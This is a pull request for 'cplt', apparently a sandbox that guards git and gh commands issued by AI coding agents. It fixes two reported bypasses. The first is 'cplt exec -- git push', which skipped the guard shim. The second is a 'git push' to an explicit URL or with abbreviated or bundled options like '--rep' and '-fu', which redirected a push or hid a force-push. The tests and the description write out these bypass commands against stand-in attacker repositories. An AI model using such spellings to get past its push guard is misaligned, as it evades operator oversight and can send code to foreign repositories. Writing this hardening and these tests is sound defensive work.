### PR TITLE
fix(guards): close two paths that skipped the git and gh gates

### DIFF
--- a/src/gh_proxy.rs
+++ b/src/gh_proxy.rs
@@ -2087,6 +2087,92 @@ const GIT_ALLOWED_SUBCOMMANDS: &[&str] = &[
 const PUSH_FLAGS_WITH_VALUE: &[&str] =
     &["--repo", "--receive-pack", "--exec", "-o", "--push-option"];
 
+/// Every long option real `git push` accepts, transcribed from `git push -h`
+/// (git 2.50.1, Apple Git-155) — plus `--help`, which parse-options adds to
+/// every builtin. The usage's `--[no-]x` spelling means `--no-x` is accepted
+/// too, so the check strips a leading `no-` before looking a name up here.
+///
+/// Fail-closed by design. Git's parse-options also resolves *unique
+/// abbreviations* (`--rep` → `--repo`, `--forc` → `--force`, `--al` →
+/// `--all`), which every parser in this file — all of them exact-match — reads
+/// as something else entirely: an abbreviated `--repo` leaves the destination
+/// URL sitting in refspec position, where it is taken for a branch name that
+/// is not the protected one, and an abbreviated `--force`/`--mirror`/`--tags`
+/// is invisible to force and unconstrainable-mode detection. Rather than
+/// reimplement git's prefix matching (and inherit its ambiguity rules), any
+/// option not spelled out exactly is refused while a push guard is active.
+/// A future git option therefore gets refused rather than silently misparsed;
+/// when one appears, add it here.
+const PUSH_LONG_OPTIONS: &[&str] = &[
+    "all",
+    "atomic",
+    "branches",
+    "delete",
+    "dry-run",
+    "exec",
+    "follow-tags",
+    "force",
+    "force-if-includes",
+    "force-with-lease",
+    "help",
+    "ipv4",
+    "ipv6",
+    "mirror",
+    "porcelain",
+    "progress",
+    "prune",
+    "push-option",
+    "quiet",
+    "receive-pack",
+    "recurse-submodules",
+    "repo",
+    "set-upstream",
+    "signed",
+    "tags",
+    "thin",
+    "verbose",
+    "verify",
+];
+
+/// The first `git push` option token that cannot be bound to an exact option,
+/// if any: an unknown/abbreviated long option, or a bundled short cluster.
+///
+/// Bundling is refused rather than expanded for the same reason abbreviation
+/// is: `-vo`, `-qo`, `-fu` and friends all parse in git and in none of this
+/// file's parsers. The one single-dash token longer than two characters that
+/// is unambiguous is `-o<value>` (`git push -oci.skip`), so it stays allowed.
+///
+/// Walks arguments the same way [`push_positionals`] does, so a flag's *value*
+/// (`-o --whatever`) is never mistaken for an option, and everything after
+/// `--` is positional.
+fn unbindable_push_option<'a>(push_args: &[&'a str]) -> Option<&'a str> {
+    let mut i = 0;
+    while i < push_args.len() {
+        let arg = push_args[i];
+        if arg == "--" {
+            break;
+        }
+        if let Some(long) = arg.strip_prefix("--") {
+            let name = long.split('=').next().unwrap_or(long);
+            if !PUSH_LONG_OPTIONS.contains(&name.strip_prefix("no-").unwrap_or(name)) {
+                return Some(arg);
+            }
+        } else if arg.starts_with('-') && arg.len() > 2 && !arg.starts_with("-o") {
+            return Some(arg);
+        }
+        if arg.starts_with('-') {
+            if !arg.contains('=') && PUSH_FLAGS_WITH_VALUE.contains(&arg) {
+                i += 2; // skip flag and its value
+            } else {
+                i += 1;
+            }
+            continue;
+        }
+        i += 1;
+    }
+    None
+}
+
 /// True if `arg` is a force-push *flag* (`--force`, `-f`, or a `--force-with-lease`/
 /// `--force-if-includes` variant, which may carry an `=`-attached value).
 fn is_force_push_flag(arg: &str) -> bool {
@@ -2198,12 +2284,50 @@ fn injected_sensitive_config_key(args: &[&str]) -> Option<(&'static str, String)
     None
 }
 
-/// Whether push args carry a `--repo`/`--repo=<url>` destination override, which
-/// redirects the push past remote-based authorization.
-fn push_has_repo_override(sub_args: &[&str]) -> bool {
-    sub_args
-        .iter()
-        .any(|a| *a == "--repo" || a.starts_with("--repo="))
+/// The push destination that escapes remote-based authorization, if any.
+///
+/// Two forms redirect a push away from the remote the guard authorizes against:
+/// `--repo`/`--repo=<url>`, and a first positional that is not a configured
+/// remote of this repository.
+///
+/// On the positional: git parses `git push [<repository> [<refspec>…]]`, and the
+/// FIRST positional is ALWAYS the repository — never a refspec. Verified against
+/// git 2.50: `git push main:main` tries to ssh to host `main`, `git push
+/// HEAD:refs/heads/x` to host `HEAD`, and `git push +main` fails with "'+main'
+/// does not appear to be a git repository". So the `main:main` (refspec) vs
+/// `host:path` (URL) ambiguity needs no syntactic tie-breaker: *position*
+/// decides, exactly as git decides it, and a refspec only ever appears from the
+/// second positional on.
+///
+/// What is left to establish is whether that repository argument is a name the
+/// guard's remote-based authorization can actually bind to, and git's own remote
+/// list is the only authority on that — no syntactic rule can do it, because a
+/// slash-less, colon-less relative path (`git push b2.git main`) is a valid
+/// destination too (GHSA-3m7m-m3rq-5cw8). With no git to ask, nothing can be
+/// proven a configured remote, so any positional is treated as an override
+/// (fail closed).
+fn push_destination_override<'a>(
+    sub_args: &[&'a str],
+    real_git: Option<&Path>,
+    repo_args: &[&str],
+) -> Option<&'a str> {
+    for (idx, arg) in sub_args.iter().enumerate() {
+        // Report the destination itself, not the flag token — the refusal says
+        // "'X' is not a configured remote", which is only true of the value.
+        if let Some(url) = arg.strip_prefix("--repo=") {
+            return Some(url);
+        }
+        if *arg == "--repo" {
+            // A trailing `--repo` with no value is git's error to give; still
+            // refuse, naming the only token there is.
+            return Some(sub_args.get(idx + 1).copied().unwrap_or(arg));
+        }
+    }
+    let dest = *push_positionals(sub_args).first()?;
+    match real_git {
+        Some(git) if resolve_remote_url(git, repo_args, dest).is_some() => None,
+        _ => Some(dest),
+    }
 }
 
 /// Resolve the destination branch a refspec targets.
@@ -2451,18 +2575,45 @@ pub fn gate_git(
         );
     }
 
-    // `git push --repo=<url>` overrides the destination entirely, so any
-    // remote/URL authorization the guard performs would be about a different
-    // target than the push writes to. Reject it while push prevention is active
-    // (H-10) — a legitimate push names a configured remote instead.
-    if prevent_push && sub == "push" && push_has_repo_override(&args[i + 1..]) {
-        return Err(
-            "⚠️ BLOCKED by sandbox: 'git push --repo=<url>' is not allowed while push prevention is active.\n\
-             It redirects the push to an arbitrary URL, bypassing remote-based authorization.\n\
-             Push to a configured remote by name instead.\n\
+    // Fail closed on any push option the guard cannot bind exactly. Git's
+    // parse-options accepts unique abbreviations and bundled short flags; the
+    // guard's parsers accept neither, and every disagreement between the two is
+    // a bypass — `--rep origin <url> feature` puts the destination in refspec
+    // position, `--forc`/`--al`/`--mir`/`--ta`/`-fu` hide a force or whole-repo
+    // push from detection. Refusing the unbindable spelling is the one check
+    // that closes both, and it sits ahead of every other push parser here so
+    // none of them ever sees a token it would misread.
+    if sub == "push"
+        && let Some(opt) = unbindable_push_option(sub_args)
+    {
+        return Err(format!(
+            "⚠️ BLOCKED by sandbox: 'git push {opt}' is not allowed in this environment.\n\
+             '{opt}' is not an exact 'git push' option. Git resolves abbreviations ('--rep' for '--repo')\n\
+             and bundled short flags ('-vo'), but the guard binds options by exact spelling, so an option\n\
+             it cannot bind is refused instead of misparsed — a misparse moves the push destination or\n\
+             hides '--force'.\n\
+             Spell the option out in full, one flag per token: `git push --repo=<url>`, `-o <option>`, `-v -o <option>`.\n\
              Please make a note of this for the human operator and continue with your remaining work."
-                .to_string(),
-        );
+        ));
+    }
+
+    // A destination that is not a configured remote — `--repo=<url>`, or the
+    // positional repository argument `git push <url|path> [refspec…]` — overrides
+    // where the push lands, so any remote/URL authorization the guard performs
+    // would be about a different target than the push writes to (H-10,
+    // GHSA-3m7m-m3rq-5cw8). Reject it while push prevention is active; a
+    // legitimate push names a configured remote instead.
+    if prevent_push
+        && sub == "push"
+        && let Some(dest) = push_destination_override(sub_args, real_git, &repo_args)
+    {
+        return Err(format!(
+            "⚠️ BLOCKED by sandbox: 'git push {dest}' is not allowed while push prevention is active.\n\
+             '{dest}' is not a configured remote of this repository, so it redirects the push past remote-based\n\
+             authorization — branch protection and allow_push rules bind to the remote, not to this argument.\n\
+             Push to a configured remote by name instead: `git push <remote> <branch>`.\n\
+             Please make a note of this for the human operator and continue with your remaining work."
+        ));
     }
 
     if prevent_push && GIT_BLOCKED_SUBCOMMANDS.contains(&sub) {
@@ -5257,9 +5408,24 @@ mod tests {
         assert!(injected_sensitive_config_key(&["push", "origin", "main"]).is_none());
         assert!(injected_sensitive_config_key(&["-C", "/some/dir", "push"]).is_none());
 
-        assert!(push_has_repo_override(&["--repo=https://x", "main"]));
-        assert!(push_has_repo_override(&["--repo", "https://x"]));
-        assert!(!push_has_repo_override(&["origin", "main"]));
+        // `--repo` is caught without consulting git at all, and reports the
+        // destination it names rather than the flag token.
+        assert_eq!(
+            push_destination_override(&["--repo=https://x", "main"], None, &[]),
+            Some("https://x")
+        );
+        assert_eq!(
+            push_destination_override(&["--repo", "https://x"], None, &[]),
+            Some("https://x")
+        );
+        // A positional destination cannot be proven a configured remote without
+        // git, so it fails closed.
+        assert_eq!(
+            push_destination_override(&["origin", "main"], None, &[]),
+            Some("origin")
+        );
+        // No positional at all is a bare `git push` — no destination override.
+        assert_eq!(push_destination_override(&["--force"], None, &[]), None);
     }
 
     #[test]
@@ -5306,6 +5472,128 @@ mod tests {
             )
             .is_err()
         );
+    }
+
+    // GHSA-3m7m-m3rq-5cw8: the first positional of `git push` is git's
+    // *repository* argument, never a refspec. Parsing `git@host:path` as a
+    // refspec made the destination branch `attacker/x.git`, which matched no
+    // protection rule, so the push escaped to another repository entirely —
+    // while the default-branch yardstick was still read from `origin`.
+    #[test]
+    fn push_to_an_explicit_destination_is_blocked() {
+        use crate::config::ResolvedPushRule;
+
+        let Some((_tmp, repo)) = scratch_repo("main", "https://github.com/me/fork.git") else {
+            return; // no git available
+        };
+        let git = which_git().unwrap();
+        make_branches(&git, &repo, &["agent/fix-123"]);
+        let dir = repo.to_string_lossy().into_owned();
+        let rules = vec![ResolvedPushRule {
+            remote: Some("origin".to_string()),
+            branches: vec!["agent/*".to_string()],
+            force: false,
+            url: Some(crate::trust::normalize_remote_url(
+                "https://github.com/me/fork.git",
+            )),
+        }];
+        // The advisory's own configuration: block mode, push and force-push
+        // prevented, only the default branch protected.
+        let gate = |args: &[&str], rules: &[ResolvedPushRule]| {
+            let mut full = vec!["-C", dir.as_str()];
+            full.extend_from_slice(args);
+            gate_git(&full, true, true, true, rules, Some(&git))
+        };
+
+        for dest in [
+            "git@github.com:attacker/x.git", // scp-style
+            "ssh://git@github.com/attacker/x.git",
+            "https://github.com/attacker/x.git",
+            "file:///tmp/attacker-x.git",
+            "../attacker-x.git", // bare filesystem path
+            "attacker-x.git",    // …and its slash-less, colon-less form
+        ] {
+            // Alone, git pushes the current branch to that destination.
+            assert!(gate(&["push", dest], &[]).is_err(), "{dest} alone");
+            // Followed by a refspec it used to read as an ordinary
+            // remote-plus-feature-branch push.
+            assert!(
+                gate(&["push", dest, "agent/fix-123"], &[]).is_err(),
+                "{dest} with refspec"
+            );
+            // An allow_push rule pinned to origin authorizes origin, not this.
+            assert!(
+                gate(&["push", dest, "agent/fix-123"], &rules).is_err(),
+                "{dest} with an origin-pinned allow_push rule"
+            );
+        }
+
+        // Git resolves unique abbreviations and bundled short flags; the
+        // guard's exact-match parsers do not, and each disagreement moved the
+        // destination out of repository position into refspec position, where
+        // it read as an ordinary feature branch. Reproduced end to end against
+        // real git: `push --rep origin <url> feature` pushed to <url>.
+        for opt in ["--rep", "--push-opt", "-vo", "-qo", "-no"] {
+            assert!(
+                gate(
+                    &[
+                        "push",
+                        opt,
+                        "origin",
+                        "file:///tmp/attacker-x.git",
+                        "agent/fix-123"
+                    ],
+                    &[]
+                )
+                .is_err(),
+                "{opt} destination override"
+            );
+        }
+        // Same class on the force/whole-repo flags: these defeat
+        // `is_force_push_flag` / `is_unconstrainable_push_flag`.
+        for opt in ["--forc", "-fu", "--al", "--mir", "--ta"] {
+            assert!(
+                gate(&["push", opt, "origin", "agent/fix-123"], &[]).is_err(),
+                "{opt} force/mode flag"
+            );
+        }
+        // Exact spellings keep working.
+        for args in [
+            &["push", "-u", "origin", "agent/fix-123"][..],
+            &["push", "-q", "-v", "origin", "agent/fix-123"][..],
+            &["push", "-n", "origin", "agent/fix-123"][..],
+            &["push", "-o", "ci.skip", "origin", "agent/fix-123"][..],
+            &["push", "-oci.skip", "origin", "agent/fix-123"][..],
+            &["push", "--push-option=ci.skip", "origin", "agent/fix-123"][..],
+            &["push", "--set-upstream", "origin", "agent/fix-123"][..],
+            &["push", "--no-verify", "origin", "agent/fix-123"][..],
+            &["push", "--atomic", "--signed", "origin", "agent/fix-123"][..],
+            &[
+                "push",
+                "--receive-pack=/usr/bin/git-receive-pack",
+                "origin",
+                "agent/fix-123",
+            ][..],
+            &[
+                "push",
+                "--exec=/usr/bin/git-receive-pack",
+                "origin",
+                "agent/fix-123",
+            ][..],
+            &["push", "origin", "--", "agent/fix-123"][..],
+        ] {
+            assert!(gate(args, &[]).is_ok(), "{args:?} must stay allowed");
+        }
+
+        // Refspecs stay refspecs from the second positional on.
+        assert!(gate(&["push", "origin", "agent/fix-123"], &[]).is_ok());
+        assert!(gate(&["push", "origin", "HEAD:refs/heads/agent/fix-123"], &[]).is_ok());
+        assert!(gate(&["push", "origin", "agent/fix-123:agent/fix-123"], &[]).is_ok());
+        // The pinned allow_push rule still authorizes its own remote.
+        assert!(gate(&["push", "origin", "agent/fix-123"], &rules).is_ok());
+        // And the protected branch is still refused through that remote.
+        assert!(gate(&["push", "origin", "main"], &[]).is_err());
+        assert!(gate(&["push", "origin", "main"], &rules).is_err());
     }
 
     // ── Security fix tests ──────────────────────────────────────────

--- a/src/main.rs
+++ b/src/main.rs
@@ -3249,6 +3249,44 @@ fn resolve_exec_binary(name: &str) -> anyhow::Result<PathBuf> {
     bail!("exec: '{name}' not found in PATH")
 }
 
+/// Point a bare guarded command name at its guard shim instead of the real
+/// binary `resolve_exec_binary` found on the parent PATH.
+///
+/// `install_command_wrappers` writes the `git`/`gh` shims into `{scratch}/bin`
+/// and prepends that directory to the *child's* PATH, which is why
+/// `cplt exec -c 'git push …'` meets the gate. `cplt exec -- git push …`
+/// never did: cplt resolves argv[0] itself, against the parent PATH, and hands
+/// the sandbox that absolute path — the shim directory never enters the
+/// lookup (GHSA-qcgr-j4mx-f92r). Redirecting here makes both spellings run the
+/// same gate.
+///
+/// A name containing a slash cannot match: `/usr/bin/git` and `./git` keep
+/// their current behaviour, the bypass SECURITY.md documents as accepted and
+/// out of scope. So does any name whose guard is disabled, and any command
+/// that is not `git` or `gh`.
+///
+/// `real` is the parent-PATH resolution, returned unchanged when no redirect
+/// applies. Taking it as an argument keeps the shim only where cplt actually
+/// found a binary to wrap: `gh` on a machine without gh still fails with
+/// "not found in PATH" rather than with a missing shim.
+fn redirect_to_guard_shim(
+    name: &str,
+    real: PathBuf,
+    scratch_dir: Option<&Path>,
+    gh_guard_enabled: bool,
+    git_guard_enabled: bool,
+) -> PathBuf {
+    let guarded = match name {
+        "git" => git_guard_enabled,
+        "gh" => gh_guard_enabled,
+        _ => false,
+    };
+    match (guarded, scratch_dir) {
+        (true, Some(scratch)) => scratch.join("bin").join(name),
+        _ => real,
+    }
+}
+
 /// Everything the sandbox assembly reads off the host machine.
 ///
 /// Pulled out as a seam: production calls [`HostProbe::probe`], while a test can
@@ -3615,26 +3653,16 @@ fn run_exec_command(
         );
     }
 
-    // Resolve the binary and args to pass to the sandbox
-    let (exec_bin, exec_args): (PathBuf, Vec<String>) = if let Some(ref shell_c) = shell_cmd {
-        // -c mode: use the same shell as --agent shell for consistent behaviour.
-        // Agent::Shell.resolve_binary() validates $SHELL exists and falls back to
-        // /bin/zsh (macOS) or /bin/bash (Linux) — same fallbacks as the interactive shell.
-        let shell = agent::Agent::Shell
-            .resolve_binary()
-            .map_err(|e| anyhow::anyhow!("{e}"))?;
-        (shell, vec!["-c".to_string(), shell_c.clone()])
-    } else {
-        if cmd.is_empty() {
-            bail!(
-                "cplt exec: no command given.\n\
-                 Usage: cplt exec -- <cmd> [args...]\n\
-                 Or:    cplt exec -c \"cmd && cmd\""
-            );
-        }
-        let bin = resolve_exec_binary(&cmd[0])?;
-        (bin, cmd[1..].to_vec())
-    };
+    // Usage error up front. The binary itself is resolved further down, after
+    // the sandbox is assembled — see there — but an empty command must not
+    // first cost a full config resolve and sandbox build.
+    if shell_cmd.is_none() && cmd.is_empty() {
+        bail!(
+            "cplt exec: no command given.\n\
+             Usage: cplt exec -- <cmd> [args...]\n\
+             Or:    cplt exec -c \"cmd && cmd\""
+        );
+    }
 
     // Resolve config, paths, project dir — same pipeline as the main agent launch
     let ResolvedContext {
@@ -3687,7 +3715,7 @@ fn run_exec_command(
         prepared,
         policy,
         proxy_handle,
-        scratch_guard: _scratch_guard,
+        scratch_guard,
         #[cfg(target_os = "macos")]
             playwright_socket_guard: _playwright_socket_guard,
         ..
@@ -3698,6 +3726,31 @@ fn run_exec_command(
         &home_dir,
         &project_dir,
     )?;
+
+    // Resolve the binary and args to pass to the sandbox.
+    //
+    // Deliberately after the sandbox is assembled: the guard shims live in the
+    // scratch bin dir this assembly creates, and a bare `git`/`gh` has to
+    // resolve to the shim rather than to the real binary on the parent PATH
+    // (see `redirect_to_guard_shim`).
+    let (exec_bin, exec_args): (PathBuf, Vec<String>) = if let Some(ref shell_c) = shell_cmd {
+        // -c mode: use the same shell as --agent shell for consistent behaviour.
+        // Agent::Shell.resolve_binary() validates $SHELL exists and falls back to
+        // /bin/zsh (macOS) or /bin/bash (Linux) — same fallbacks as the interactive shell.
+        let shell = agent::Agent::Shell
+            .resolve_binary()
+            .map_err(|e| anyhow::anyhow!("{e}"))?;
+        (shell, vec!["-c".to_string(), shell_c.clone()])
+    } else {
+        let bin = redirect_to_guard_shim(
+            &cmd[0],
+            resolve_exec_binary(&cmd[0])?,
+            scratch_guard.as_ref().map(cplt::scratch::ScratchDir::path),
+            resolved.gh_guard.enabled,
+            resolved.git_guard.enabled,
+        );
+        (bin, cmd[1..].to_vec())
+    };
 
     warn_shim_target_without_exec(&policy, &exec_bin);
 
@@ -6543,6 +6596,63 @@ mod tests {
         let cli = parse(&[]);
         let args = build_copilot_args(&cli, &agent::Agent::OpenCode);
         assert!(args.is_empty());
+    }
+
+    // ── `cplt exec` binary resolution (`redirect_to_guard_shim`) ──────────
+
+    /// GHSA-qcgr-j4mx-f92r: `cplt exec -- git push` executed the parent PATH's
+    /// real git, so the guard never ran, while `cplt exec -c 'git push'` was
+    /// refused. A bare guarded name must resolve to the shim.
+    #[test]
+    fn a_bare_guarded_name_resolves_to_the_guard_shim() {
+        let scratch = PathBuf::from("/scratch");
+        let real = PathBuf::from("/usr/bin/git");
+        assert_eq!(
+            redirect_to_guard_shim("git", real.clone(), Some(&scratch), true, true),
+            PathBuf::from("/scratch/bin/git")
+        );
+        assert_eq!(
+            redirect_to_guard_shim(
+                "gh",
+                PathBuf::from("/usr/bin/gh"),
+                Some(&scratch),
+                true,
+                true
+            ),
+            PathBuf::from("/scratch/bin/gh")
+        );
+
+        // Guard off → unchanged, for each guard independently.
+        assert_eq!(
+            redirect_to_guard_shim("git", real.clone(), Some(&scratch), true, false),
+            real
+        );
+        assert_eq!(
+            redirect_to_guard_shim(
+                "gh",
+                PathBuf::from("/usr/bin/gh"),
+                Some(&scratch),
+                false,
+                true
+            ),
+            PathBuf::from("/usr/bin/gh")
+        );
+
+        // No scratch dir → no shim was installed, so nothing to redirect to.
+        assert_eq!(
+            redirect_to_guard_shim("git", real.clone(), None, true, true),
+            real
+        );
+
+        // A path with a slash keeps the documented, out-of-scope behaviour
+        // (SECURITY.md), and every unguarded command is untouched.
+        for name in ["/usr/bin/git", "./git", "../gh", "ls", "gitk", "ghost"] {
+            assert_eq!(
+                redirect_to_guard_shim(name, real.clone(), Some(&scratch), true, true),
+                real,
+                "{name} must not be redirected"
+            );
+        }
     }
 
     // ── guard verdict → effect (`decide_gh_gate` / `decide_git_gate`) ──────

--- a/tests/e2e.rs
+++ b/tests/e2e.rs
@@ -4978,6 +4978,104 @@ paths = [
         );
     }
 
+    /// GHSA-qcgr-j4mx-f92r: `cplt exec -- git push …` resolved argv[0] against
+    /// the parent PATH and executed the real git, so the git guard never ran —
+    /// while `cplt exec -c 'git push …'` was refused, because only the child's
+    /// PATH carries the shim directory. Both spellings must be refused.
+    ///
+    /// The remote is a bare repo on disk: if the guard ever fails open again,
+    /// the push lands there and never on a network remote.
+    #[test]
+    fn e2e_exec_bare_git_name_hits_the_git_guard() {
+        require_sandbox!();
+
+        // Inside the checkout, not /tmp: the sandbox denies process-exec under
+        // /private/tmp, so the git this pushes with must live in an
+        // exec-allowed location — same reasoning as the guard e2e fixtures.
+        let tmp = tempfile::Builder::new()
+            .prefix(".cplt-e2e-exec-git-guard-")
+            .tempdir_in(env!("CARGO_MANIFEST_DIR"))
+            .expect("create temp dir");
+        let origin = tmp.path().join("origin.git");
+        let work = tmp.path().join("work");
+        std::fs::create_dir_all(&work).expect("create work dir");
+
+        let run_git = |dir: &Path, args: &[&str]| {
+            let out = git_cmd(dir)
+                .args(args)
+                .env("GIT_AUTHOR_NAME", "Test")
+                .env("GIT_AUTHOR_EMAIL", "test@test.com")
+                .env("GIT_COMMITTER_NAME", "Test")
+                .env("GIT_COMMITTER_EMAIL", "test@test.com")
+                .output()
+                .expect("git should run");
+            assert!(
+                out.status.success(),
+                "git {args:?} should succeed: {}",
+                String::from_utf8_lossy(&out.stderr)
+            );
+        };
+        run_git(
+            tmp.path(),
+            &["init", "--bare", "-b", "main", origin.to_str().unwrap()],
+        );
+        run_git(&work, &["init", "-b", "main"]);
+        run_git(&work, &["commit", "--allow-empty", "-m", "init"]);
+        run_git(
+            &work,
+            &["remote", "add", "origin", origin.to_str().unwrap()],
+        );
+
+        // The bare origin is outside the project dir, so grant write on it:
+        // without the grant a fail-open push would be stopped by the sandbox
+        // rather than by the guard, and the test would pass for the wrong
+        // reason.
+        let allow_origin = origin.to_string_lossy().into_owned();
+        let push = |args: &[&str]| {
+            let out = cplt_cmd()
+                .args(["--allow-write", &allow_origin])
+                .args(args)
+                .current_dir(&work)
+                .output()
+                .expect("cplt exec should run");
+            (
+                out.status.success(),
+                String::from_utf8_lossy(&out.stderr).into_owned(),
+            )
+        };
+
+        let (bare_ok, bare_stderr) = push(&[
+            "--no-validate",
+            "exec",
+            "--",
+            "git",
+            "push",
+            "origin",
+            "main",
+        ]);
+        let (shell_ok, shell_stderr) =
+            push(&["--no-validate", "exec", "-c", "git push origin main"]);
+
+        assert!(
+            !shell_ok && shell_stderr.contains("BLOCKED by sandbox"),
+            "control: exec -c 'git push' must be refused by the git guard.\n{shell_stderr}"
+        );
+        assert!(
+            !bare_ok && bare_stderr.contains("BLOCKED by sandbox"),
+            "exec -- git push must be refused by the same guard as the -c form.\n{bare_stderr}"
+        );
+
+        // And nothing reached the remote either way.
+        let pushed = git_cmd(&origin)
+            .args(["rev-parse", "--verify", "refs/heads/main"])
+            .output()
+            .expect("git should run");
+        assert!(
+            !pushed.status.success(),
+            "no push may have reached the origin"
+        );
+    }
+
     #[test]
     fn e2e_exec_no_quiet_shows_summary() {
         require_sandbox!();

--- a/tests/e2e_guards.rs
+++ b/tests/e2e_guards.rs
@@ -186,13 +186,44 @@ fn git_gate_with_mode(
     prevent_force_push: bool,
     mode: &str,
 ) -> (String, String, bool) {
+    git_gate_inner(args, prevent_push, prevent_force_push, mode, false)
+}
+
+/// `git-gate` in block mode with a git the guard can query — for push tests,
+/// where the verdict depends on resolving the named remote.
+fn git_gate_push(
+    args: &[&str],
+    prevent_push: bool,
+    prevent_force_push: bool,
+) -> (String, String, bool) {
+    git_gate_inner(args, prevent_push, prevent_force_push, "block", true)
+}
+
+fn git_gate_inner(
+    args: &[&str],
+    prevent_push: bool,
+    prevent_force_push: bool,
+    mode: &str,
+    resolvable_git: bool,
+) -> (String, String, bool) {
     // The gate resolves the target repo from the cwd; a temp repo keeps that
     // independent of whatever origin the checkout running the tests has.
     let repo = temp_repo("navikt/cplt");
+    // `resolvable_git` supplies a git the guard can actually query (`remote
+    // get-url`, `symbolic-ref`, `rev-parse`) while keeping the push itself a
+    // no-op. Without it the guard cannot tell a configured remote from an
+    // arbitrary URL destination, so a push is refused for that reason instead
+    // of the one under test. Commands other than push run for real, which is
+    // why it is not the default: `git log`/`pull` in a bare fixture fail.
+    let real_git = if resolvable_git {
+        fake_push_git(repo.path())
+    } else {
+        std::path::PathBuf::from("/usr/bin/true")
+    };
     let mut cmd = cplt_cmd();
     cmd.arg("git-gate")
         .arg("--real-git")
-        .arg("/usr/bin/true")
+        .arg(&real_git)
         .arg(format!("--mode={mode}"))
         .arg(format!("--prevent-push={prevent_push}"))
         .arg(format!("--prevent-force-push={prevent_force_push}"))
@@ -1260,13 +1291,87 @@ fn git_gate_blocks_push() {
 
 #[test]
 fn git_gate_blocks_push_with_remote() {
-    let (_, stderr, ok) = git_gate(&["push", "origin", "main"], true, true);
+    let (_, stderr, ok) = git_gate_push(&["push", "origin", "main"], true, true);
     assert_refused(&stderr, ok, "Push prevention is enabled");
+}
+
+// GHSA-3m7m-m3rq-5cw8: an explicit destination is git's repository argument,
+// not a refspec, and it escapes remote-based authorization entirely.
+#[test]
+fn git_gate_blocks_push_to_an_explicit_destination() {
+    for dest in [
+        "git@github.com:attacker/x.git",
+        "ssh://git@github.com/attacker/x.git",
+        "https://github.com/attacker/x.git",
+        "file:///tmp/attacker-x.git",
+        "../attacker-x.git",
+    ] {
+        let (_, stderr, ok) = git_gate_push(&["push", dest], true, true);
+        assert_refused(&stderr, ok, "not a configured remote");
+        let (_, stderr, ok) = git_gate_push(&["push", dest, "main"], true, true);
+        assert_refused(&stderr, ok, "not a configured remote");
+    }
+}
+
+// Same advisory, second half: git resolves unique long-option abbreviations
+// (`--rep` = `--repo`) and bundled short flags (`-vo`), the guard's parsers do
+// not, and the disagreement moved the destination URL into refspec position —
+// where it read as a feature branch and passed under
+// protect_default_branch_only. Verified end to end against real git 2.50.
+#[test]
+fn git_gate_blocks_abbreviated_and_bundled_push_options() {
+    for opt in ["--rep", "--push-opt", "-vo", "-qo", "-no"] {
+        let (_, stderr, ok) = git_gate_protect_default(&[
+            "push",
+            opt,
+            "origin",
+            "file:///tmp/attacker-x.git",
+            "feature/my-work",
+        ]);
+        assert_refused(&stderr, ok, "is not an exact 'git push' option");
+    }
+    // The same class hides a force or whole-repo push from flag detection.
+    for opt in ["--forc", "-fu", "--al", "--mir", "--ta"] {
+        let (_, stderr, ok) = git_gate_protect_default(&["push", opt, "origin", "feature/my-work"]);
+        assert_refused(&stderr, ok, "is not an exact 'git push' option");
+    }
+}
+
+// The fail-closed option check must not cost any legitimate spelling.
+#[test]
+fn git_gate_allows_exactly_spelled_push_options() {
+    for args in [
+        &["push", "-u", "origin", "feature/my-work"][..],
+        &["push", "-q", "-v", "origin", "feature/my-work"][..],
+        &["push", "-n", "origin", "feature/my-work"][..],
+        &["push", "-o", "ci.skip", "origin", "feature/my-work"][..],
+        &["push", "-oci.skip", "origin", "feature/my-work"][..],
+        &["push", "--push-option=ci.skip", "origin", "feature/my-work"][..],
+        &["push", "--set-upstream", "origin", "feature/my-work"][..],
+        &["push", "--no-verify", "origin", "feature/my-work"][..],
+        &["push", "--atomic", "--signed", "origin", "feature/my-work"][..],
+        &[
+            "push",
+            "--exec=/usr/bin/git-receive-pack",
+            "origin",
+            "feature/my-work",
+        ][..],
+        &[
+            "push",
+            "--receive-pack=/usr/bin/git-receive-pack",
+            "origin",
+            "feature/my-work",
+        ][..],
+        &["push", "origin", "--", "feature/my-work"][..],
+    ] {
+        let (_, stderr, ok) = git_gate_protect_default(args);
+        assert!(ok, "{args:?} must stay allowed.\n{stderr}");
+    }
 }
 
 #[test]
 fn git_gate_blocks_push_force() {
-    let (_, stderr, ok) = git_gate(&["push", "--force", "origin", "main"], true, true);
+    let (_, stderr, ok) = git_gate_push(&["push", "--force", "origin", "main"], true, true);
     assert_refused(&stderr, ok, "Push prevention is enabled");
 }
 
@@ -1351,19 +1456,20 @@ fn git_gate_audit_mode_allows_push() {
 
 #[test]
 fn git_gate_blocks_push_with_refspec() {
-    let (_, stderr, ok) = git_gate(&["push", "origin", "HEAD:refs/heads/main"], true, true);
+    let (_, stderr, ok) = git_gate_push(&["push", "origin", "HEAD:refs/heads/main"], true, true);
     assert_refused(&stderr, ok, "Push prevention is enabled");
 }
 
 #[test]
 fn git_gate_blocks_push_with_set_upstream() {
-    let (_, stderr, ok) = git_gate(&["push", "--set-upstream", "origin", "feature"], true, true);
+    let (_, stderr, ok) =
+        git_gate_push(&["push", "--set-upstream", "origin", "feature"], true, true);
     assert_refused(&stderr, ok, "Push prevention is enabled");
 }
 
 #[test]
 fn git_gate_blocks_push_u_shorthand() {
-    let (_, stderr, ok) = git_gate(&["push", "-u", "origin", "feature"], true, true);
+    let (_, stderr, ok) = git_gate_push(&["push", "-u", "origin", "feature"], true, true);
     assert_refused(&stderr, ok, "Push prevention is enabled");
 }
 


### PR DESCRIPTION
Two ways a command reached the real binary without the gate running. Both worked with the default configuration, through interfaces cplt documents, so they hit the cooperative agents the guards claim to constrain rather than only the adversarial ones `SECURITY.md` already excludes.

## 1. `cplt exec` skipped the shims

`run_exec_command` resolved argv[0] against the parent PATH before the sandbox was assembled, and the scratch `bin` directory is only prepended to PATH afterwards, so the shim never entered the picture.

```
cplt exec -- git push origin main          → 328c45f..ec412fa  main -> main
cplt exec -- sh -c 'git push origin main'  → BLOCKED by sandbox
```

A bare `git`/`gh` now resolves to the shim once the scratch dir exists. A name containing a slash (`/usr/bin/git`, `./git`) is unchanged — `SECURITY.md` documents that as accepted and out of scope, and this does not try to close it.

## 2. `git push <url>` escaped remote-based authorization

A positional URL was read as a refspec, so the destination fell back to `origin` and branch protection was evaluated against the wrong repository. Standing on the default branch, `git push <attacker-url>` pushed it.

git's grammar is `git push [<repository> [<refspec>…]]`, so the first positional is the repository, never a refspec. It is now resolved against the configured remotes: resolves, proceed as before; does not resolve or no git to ask, fail closed.

